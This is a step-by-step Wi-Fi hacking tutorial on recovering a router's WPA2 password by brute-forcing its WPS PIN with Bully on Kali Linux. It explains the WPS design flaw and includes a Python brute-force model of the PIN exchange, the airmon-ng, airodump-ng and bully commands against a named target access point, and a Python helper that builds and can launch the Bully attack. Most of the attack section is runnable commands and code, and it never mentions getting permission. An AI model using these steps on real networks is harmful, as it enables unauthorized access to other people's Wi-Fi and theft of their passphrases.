>WIFI_HACKING_
Breaking WPS PIN w/ BuLLy
WPS stands for Wi-Fi Protected Setup and was designed to make setting up a secure AP simpler for
the average homeowner. First introduced
in 2006, by 2011 it was discovered that it had a serious design flaw: the WPS PIN can be
brute-forced rather simply.
The PIN is 8 digits, but the last digit is a checksum of the other 7, so only 7 digits are unknown.
Worse, the registrar exchange confirms the first 4 digits separately from the last 3, so an attacker
needs at most 10,000 + 1,000 = 11,000 guesses rather than 10,000,000, and an AP of that era will
answer that many in a few hours. Once the PIN is confirmed, the AP hands over the WPA2
preshared key (the password) in the final message of the exchange, so there is nothing left to crack.
Since a dictionary attack against a captured WPA2 handshake can take hours to days and may never
succeed against a strong passphrase, an AP with this feature enabled
and not patched is a much
faster route to getting the PSK.
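Why the PIN falls so quickly, as an added example that is not code from the original article or from Bully: a small Python model of the registrar exchange. `FakeRegistrar` is a constructed stand-in for an AP without lockout (it answers with a NACK after message M4 when the first four digits are wrong, and a NACK after M6 when only the last four are wrong), `crack` searches the two halves the way Bully and Reaver do, and the target PIN 12345670 is a constructed example value. The `bruteforce_checksum` switch covers the edge case of an AP whose PIN does not obey the checksum rule, which is when Bully's checksum brute-force option is needed.

```python
# Added example (not from the original article or from Bully): a model
# of the WPS registrar exchange showing why an 8-digit PIN takes at most
# about 11,000 guesses rather than 10^7. The AP side is a constructed
# stand-in, not a real access point.


def wps_checksum(first7: int) -> int:
    """Checksum (8th) digit for the first seven PIN digits, as WPS defines
    it: digits weighted 3,1,3,1,3,1,3 from the left, summed modulo 10."""
    accum, rest = 0, first7
    while rest:
        accum += 3 * (rest % 10)
        rest //= 10
        accum += rest % 10
        rest //= 10
    return (10 - accum % 10) % 10


def make_pin(first7: int) -> str:
    """Full 8-digit PIN string for a 7-digit value (zero-padded)."""
    return f"{first7:07d}{wps_checksum(first7)}"


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN carries the correct checksum digit."""
    return (len(pin) == 8 and pin.isdigit()
            and int(pin[7]) == wps_checksum(int(pin[:7])))


class FakeRegistrar:
    """Constructed stand-in for the AP's WPS registrar (no lockout).

    A real AP of the vulnerable era answers the same way: NACK after M4
    if the first four digits are wrong, NACK after M6 if only the last
    four are wrong, and M7 (which carries the PSK) when the PIN matches.
    Leaking which half failed is the design flaw.
    """

    def __init__(self, pin: str):
        self.pin = pin          # the AP's PIN; need not have a valid checksum
        self.attempts = 0       # how many PIN exchanges the attacker ran

    def try_pin(self, guess: str) -> str:
        self.attempts += 1
        if guess[:4] != self.pin[:4]:
            return "nack-m4"
        if guess[4:] != self.pin[4:]:
            return "nack-m6"
        return "ok"


def crack(ap: FakeRegistrar, bruteforce_checksum: bool = False):
    """Recover the PIN half by half, as Bully and Reaver do.

    With bruteforce_checksum=False the last digit is derived from the
    checksum rule: at most 10,000 + 1,000 guesses. With True the second
    phase tries all 10,000 endings (Bully's checksum brute-force mode),
    at most 20,000 guesses. Returns (pin, attempts), or None if the
    second half is never found (e.g. checksum assumed but not obeyed).
    """
    first = None
    for h1 in range(10_000):
        guess = make_pin(h1 * 1000)   # first half under test; rest is a placeholder
        resp = ap.try_pin(guess)
        if resp == "ok":              # placeholder happened to be right too
            return guess, ap.attempts
        if resp == "nack-m6":         # first half confirmed, second half wrong
            first = guess[:4]
            break
    if first is None:
        return None
    if bruteforce_checksum:
        candidates = (first + f"{h2:04d}" for h2 in range(10_000))
    else:
        candidates = (make_pin(int(first) * 1000 + h2) for h2 in range(1_000))
    for guess in candidates:
        if ap.try_pin(guess) == "ok":
            return guess, ap.attempts
    return None


def max_attempts(bruteforce_checksum: bool = False) -> int:
    """Upper bound on PIN exchanges, versus 10**7 for a naive 7-digit search."""
    return 10_000 + (10_000 if bruteforce_checksum else 1_000)


if __name__ == "__main__":
    ap = FakeRegistrar("12345670")    # constructed target PIN
    print(crack(ap), "of at most", max_attempts())
```

Run against the constructed target, `crack` needs 1,803 exchanges (1,235 to confirm 1234, then 568 for 567 plus its checksum). Against a PIN with a bad checksum, the default search fails and returns None, while the brute-force mode still recovers it at the cost of up to 20,000 exchanges.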
It's important to note, though, that newer APs generally mitigate this attack: firmware fixes and
later models lock WPS for a period after a handful of failed PIN attempts, which turns a few hours
into days or weeks, and many now ship with WPS disabled. This attack is really aimed at APs sold during that
window of 2006 to early 2012 that never got that fix. Since many families keep their APs for many years,
there are still plenty of these vulnerable ones around.
*For this to work, we'll need a compatible wireless network adapter: one whose driver supports monitor mode and packet injection.*
- Step 1: Fire Up Kali -
Let's start by firing up our favorite hacking Linux distribution, Kali. Then open a terminal and check that your wireless adapter is listed (here it is wlan0):
![backtrack screenshot](https://img.wonderhowto.com/img/64/21/63553116487064/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
> iwconfig
![backtrack screenshot](https://img.wonderhowto.com/img/76/10/63553116587767/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
- Step 2: Put Your WiFi Adapter in Monitor Mode -
The next step is to put your Wi-Fi adapter in monitor mode. This is similar to promiscuous mode on a wired connection: the adapter passes up every 802.11 frame it hears on its channel without having to associate to any network. We can use one of the tools from the Aircrack-ng suite, Airmon-ng, to accomplish this task. If Airmon-ng warns about interfering processes such as NetworkManager, `airmon-ng check kill` stops them first. Note that older Kali and BackTrack builds name the monitor interface mon0, as in the commands below, while current Aircrack-ng releases name it wlan0mon; read the name from Airmon-ng's output and use that one in every command that follows.
> airmon-ng start wlan0
![backtrack screenshot](https://img.wonderhowto.com/img/60/28/63553116649111/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
> airodump-ng mon0
![backtrack screenshot](https://img.wonderhowto.com/img/27/78/63553116708080/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
- Step 3: Use airodump-ng to get necessary Info -
Airodump-ng lists every AP it hears with its BSSID, channel (CH), encryption (ENC) and ESSID; note those three values for the target. To confirm that the target actually advertises WPS and is not currently locked, `wash -i mon0` (from the Reaver package) lists only WPS-enabled APs together with their lock state. Finally, all we need to do is to put this info into our Bully command.
> bully mon0 -b 00:25:9C:97:4F:48 -e Mandela2 -c 9
Let's break down that command to see what's happening.
- mon0 is the name of the wireless adapter in monitor mode.
- -b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
- -e Mandela2 is the SSID of the AP.
- -c 9 is the channel the AP is broadcasting on.
All of this information is available in the screen above with Airodump-ng.
![backtrack screenshot](https://img.wonderhowto.com/img/37/72/63553116820033/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
- Step 4: Start Bully -
When we hit enter, Bully will start to try to crack the WPS PIN. It confirms the first four digits first, then the remaining three, and when the PIN is accepted it prints the PIN together with the WPA PSK the AP handed over. If the AP reports WPS as locked, Bully waits and retries, so against an AP with lockout the run can take far longer than a few hours.
![backtrack screenshot](https://img.wonderhowto.com/img/42/11/63553116830205/0/hack-wi-fi-breaking-wps-pin-get-password-with-bully.w1456.jpg)
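Putting Steps 2 to 4 together, as an added example that is not part of the original article: a Python helper that reads the CSV airodump-ng writes when started with `-w` (`airodump-ng -w scan mon0` produces `scan-01.csv`), picks the target by ESSID, and assembles the same Bully command as Step 3. The CSV text, the ESSIDs and the BSSIDs in it are constructed sample data laid out like airodump-ng's CSV, not a real capture; `mon0` is the interface name from Step 2, and the `attack` helper is this example's own name.

```python
# Added example (not from the original article): glue from airodump-ng's
# CSV output to the Bully command line. SAMPLE_CSV is constructed data in
# airodump-ng's CSV layout (AP table, blank line, station table).
import csv
import io
import shlex
import subprocess

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:25:9C:97:4F:48, 2014-01-01 10:00:00, 2014-01-01 10:05:00,  9,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   8, Mandela2, 
00:11:22:33:44:55, 2014-01-01 10:00:00, 2014-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -70,   80,  0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_airodump_csv(text: str) -> list:
    """Return one dict per AP from the first table of an airodump-ng CSV."""
    text = text.replace("\r\n", "\n").strip()
    ap_table = text.split("\n\n", 1)[0]      # everything before the station table
    reader = csv.DictReader(io.StringIO(ap_table), skipinitialspace=True)
    aps = []
    for row in reader:
        aps.append({
            "bssid": row["BSSID"].strip(),
            "channel": int(row["channel"].strip()),
            "privacy": row["Privacy"].strip(),
            "essid": row["ESSID"].strip(),   # an ESSID containing a comma would need raw parsing
        })
    return aps


def pick_target(aps: list, essid: str) -> dict:
    """Select the AP by ESSID and refuse ambiguity: Bully's -b must name exactly
    one BSSID, and several APs may broadcast the same SSID."""
    matches = [ap for ap in aps if ap["essid"] == essid]
    if len(matches) != 1:
        raise ValueError(f"expected exactly one AP named {essid!r}, found {len(matches)}")
    return matches[0]


def bully_argv(iface: str, ap: dict) -> list:
    """The Step 3 command: monitor interface, -b BSSID, -e ESSID, -c channel."""
    return ["bully", iface, "-b", ap["bssid"], "-e", ap["essid"], "-c", str(ap["channel"])]


def attack(iface: str, csv_text: str, essid: str, run: bool = False) -> list:
    """Build (and, if run=True, execute) the Bully command for the named AP."""
    argv = bully_argv(iface, pick_target(parse_airodump_csv(csv_text), essid))
    print(shlex.join(argv))
    if run:                                   # needs root and a monitor-mode interface
        subprocess.run(argv, check=False)
    return argv


if __name__ == "__main__":
    attack("mon0", SAMPLE_CSV, "Mandela2")    # prints: bully mon0 -b 00:25:9C:97:4F:48 -e Mandela2 -c 9
```

By default the helper only prints the command; pass `run=True` to execute Bully for real. Keying the selection on a single BSSID rather than the SSID alone is deliberate, since attacking the wrong one of two same-named APs is the most common way a run silently goes nowhere.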